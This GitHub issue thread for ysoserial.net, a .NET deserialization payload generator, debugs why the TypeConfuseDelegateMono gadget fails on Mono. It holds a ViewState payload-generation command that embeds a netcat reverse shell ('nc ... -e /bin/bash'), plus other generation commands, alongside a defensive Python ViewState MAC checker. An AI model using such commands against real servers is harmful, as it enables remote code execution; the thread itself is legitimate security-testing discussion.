pwntester / ysoserial.net

Deserialization payload generator for a variety of .NET formatters


Payload for Mono not working

halfluke opened this issue · comments

Hi.

Any idea why the typeconfusedelegatemono doesn't work for me?

I built the supersimple example from https://www.monodevelop.com/documentation/creating-aspnet-projects/ and I run it in xsp4, but the viewstate - which should be MAC enabled but not encrypted, .net 4.0 version, looks weird and the payload generated by ysoserial.net - which is much longer - does not work. I'm using a specific validationkey in web.config for testing.

%2FwEMDAwQAgAADgEMBQMMEAIAAA4BDAUBDBACDA8BAQRUZXh0AQ5Zb3UgY2xpY2tlZCBtZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALvN0281sXomxFcIhy33ycX5EfZiafqaB78GIBHdjmVX

Mono Version Information: 6.10.0.104 (tarball Fri Jun 26 19:38:24 UTC 2020); ASP.NET Version: 4.0.30319.42000

Payload generated with:
./ysoserial.exe -p ViewState -g TypeConfuseDelegateMono -c "nc 127.0.0.1 555 -e /bin/bash" --path="/Default.aspx" --apppath="/" --islegacy --validationalg="SHA1" --validationkey="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" --isdebug

I can recreate this issue but I don't know how to debug it properly. It seems that it also does not understand ViewStateEncryptionMode="Never", and the following also does not disable the MAC validation:

<appSettings>
      <add key="aspnet:AllowInsecureDeserialization" value="true" />
</appSettings>

I am not exactly sure why but it would be great if someone with more information can help here.
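Since both posts above hinge on whether the ViewState MAC is actually being enforced, here is an added Python check that is not part of ysoserial.net or this issue: it decodes the __VIEWSTATE posted above (showing that, unencrypted, the serialized strings are readable), and verifies a legacy-mode HMACSHA1 trailer against a constructed key and modifier. The key and modifier are assumptions for the demo; real ASP.NET derives the modifier from the page, which is what the --path and --apppath options in the command above exist to reproduce.

```python
import base64
import hashlib
import hmac
from urllib.parse import unquote

LOS_HEADER = b"\xff\x01"  # ObjectStateFormatter version marker that starts every ViewState
MAC_LEN = 20              # HMACSHA1 trailer length in the legacy (.NET 4.0, SHA1) MAC mode

# First 70 characters of the __VIEWSTATE posted in the issue above (URL-encoded base64).
POSTED_VIEWSTATE_PREFIX = "%2FwEMDAwQAgAADgEMBQMMEAIAAA4BDAUBDBACDA8BAQRUZXh0AQ5Zb3UgY2xpY2tlZCBtZQ"

# Constructed test values. A real validationKey lives in web.config, and real ASP.NET derives
# the modifier from the page (the values that --path/--apppath in the command above reproduce).
TEST_KEY = bytes.fromhex("0123456789abcdef" * 4)
TEST_MODIFIER = (0x1234ABCD).to_bytes(4, "little")

def decode_viewstate(encoded: str) -> bytes:
    """URL-decode then base64-decode __VIEWSTATE, restoring '=' padding lost in copy/paste."""
    s = unquote(encoded).strip()
    return base64.b64decode(s + "=" * (-len(s) % 4))

def has_los_header(blob: bytes) -> bool:
    return blob[:2] == LOS_HEADER

def legacy_mac(validation_key: bytes, data: bytes, modifier: bytes) -> bytes:
    """Legacy ViewState MAC: HMACSHA1(validationKey, serialized data || modifier)."""
    return hmac.new(validation_key, data + modifier, hashlib.sha1).digest()

def verify_legacy_mac(blob: bytes, validation_key: bytes, modifier: bytes) -> bool:
    """True only if the LOS header is present and the 20-byte trailer matches the recomputed MAC."""
    if len(blob) <= MAC_LEN or not has_los_header(blob):
        return False
    data, mac = blob[:-MAC_LEN], blob[-MAC_LEN:]
    return hmac.compare_digest(legacy_mac(validation_key, data, modifier), mac)

def sign_viewstate(validation_key: bytes, body: bytes, modifier: bytes) -> str:
    """Build a MAC-protected, unencrypted ViewState from a serialized body, as the server does."""
    data = LOS_HEADER + body
    return base64.b64encode(data + legacy_mac(validation_key, data, modifier)).decode()

def demo_roundtrip() -> tuple:
    """Sign a constructed body; verification must pass intact and fail after one byte is altered."""
    signed = decode_viewstate(sign_viewstate(TEST_KEY, b"\x0c\x0c\x10\x02\x00\x00", TEST_MODIFIER))
    tampered = signed[:2] + bytes([signed[2] ^ 0x01]) + signed[3:]
    return (verify_legacy_mac(signed, TEST_KEY, TEST_MODIFIER),
            verify_legacy_mac(tampered, TEST_KEY, TEST_MODIFIER))
```

Running `decode_viewstate(POSTED_VIEWSTATE_PREFIX)` on the posted value shows the control text "Text" and "You clicked me" in clear, which is what "MAC enabled but not encrypted" looks like on the wire.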

Where is the ./ysoserial.exe file in this tool? I didn't get it.

I have got the same trouble with the command .\ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -o raw -c "calc" -t. A sound is produced but no calc appears.

@sushantdhopat19 ./ysoserial.exe is the compiled binary. To get it I launched ysoserial.sln and build from visual studio.

This commit used to work: https://github.com/pwntester/ysoserial.net/commit/138e21649b9b3977b95f7d3c42e637e17861598c as told in this post. I think Mono has been updated and the gadget is not valuable anymore.

This article may help: https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf

I will get a look at the gadgets. Assign me please. But continue to notify me if somebody wants to make a PR too. I may take a long time.

In order to locate the trouble I made a tiny vulnerable program. Then I put a file: \ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -o raw -c "calc" > tmp.dat

EDIT
When I deserialize, I get the following:
END OF EDIT

Binary stream '0' does not contain a valid BinaryHeader. Possible causes are invalid stream or object version change between serialization and deserialization.

It is useful to find the right gadget.

@halfluke can you just tell me if you have the same symptom with the calc please?

I can't confirm about the calc because I tried to generate a payload for linux. How would I test a calc payload if it has to run under linux?

@halfluke try another command like .\ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -o raw -c "touch file.txt" -t

I found on internet an article of how this code was built: http://muffsec.com/blog/?p=585

In my opinion the code used to be very close to this code: http://muffsec.com/blog/?p=585 but now SessionSecurityToken has been removed from https://docs.microsoft.com/en-us/dotnet/api/system.identitymodel.tokens.sessionsecuritytoken?view=netframework-4.8 and the gadget does not work anymore. The modification might have been removed from the history and might not have been replaced yet.

EDIT: I was wrong, the package is still available in nuget. See: https://stackoverflow.com/questions/19797557/add-a-reference-to-the-system-identitymodel-tokens-dll But is it present on Mono? I am going to dig.

EDIT: I need an older mono version to test. The newer version of mono.

The code from muffsec works on my machine now. I needed to use old .net framework: https://stackoverflow.com/questions/19797557/add-a-reference-to-the-system-identitymodel-tokens-dll.

Sadly I just realised it was the code for TypeConfuseDelegate, not TypeConfuseDelegateMono. I have to dig deeper and deeper.

I am going to try to compile with mono to check the payload.

Sorry, I do not have time to test much at the moment. Thank you for your efforts.

It should work in the latest version now (download it from https://github.com/mono/mono/actions)